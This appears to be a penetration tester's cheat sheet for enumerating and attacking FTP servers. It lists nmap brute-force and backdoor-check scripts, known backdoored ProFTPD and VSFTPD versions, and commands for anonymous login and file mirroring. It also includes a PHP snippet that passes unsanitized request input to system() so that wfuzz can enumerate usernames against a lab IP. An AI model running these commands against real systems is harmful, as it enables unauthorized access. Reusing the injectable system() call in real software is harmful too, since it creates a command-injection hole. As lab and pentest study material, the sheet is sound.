21 ) FTP

01. Common Enumeration

## ------------------| Nmap scans
find / -type f -name ftp* 2>/dev/null | grep scripts
nmap --script ftp-brute -p 21 $IP
nmap --script ftp-vsftpd-backdoor -p 21 
nmap --script ftp-vuln-cve2010-4221 -p 21 $IP
nmap --script ftp-anon.nse -p 21 $IP
nmap --script ftp-bounce.nse -p 21 $IP
nmap --script ftp-brute.nse -p 21 $IP
nmap --script ftp-libopie -p 21 $IP
nmap --script ftp-brute -p 21 $IP

## ------------------| Anonymous Login
anonymous

## ------------------| Login
ftp://<username>:'<password>'@ip

• Vulnerable versions

ProFTPD-1.3.3c Backdoor
ProFTPD 1.3.5 Mod_Copy Command Execution
VSFTPD v2.3.4 Backdoor Command Execution

• Enumerate users.

# Create php script (Change the ip address and file name shoud be index.php)
nano index.php
<?php
    system("echo ". $_REQUEST['username'] ." | timeout 2 ftp 10.10.10.197");
?>

# Then host it (but it is too slow) 
sudo php -S 127.0.0.1:80

# Or you can host it on apache2 (much faster than above one)
cp index.php /var/www/html/index.php
service apache2 start

# Then run wfuzz tool
wfuzz -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -u http://127.0.0.1/index.php?username=FUZZ     

• Download all files at ones

wget -m --user=username --password=password ftp://<hostIP>
wget -m --no-passive ftp://anonymous:anonymous@<hostIP>

• Service Interaction

## ------------------| NetCat
nc -nv <hostIP> 21

## ------------------| Telnet
telnet <hostIP> 21

## ------------------| OpenSSL
openssl s_client -connect <hostIP>:21 -starttls ftp

• Useful links

  • https://vk9-sec.com/21-tcp-ftp-enumeration/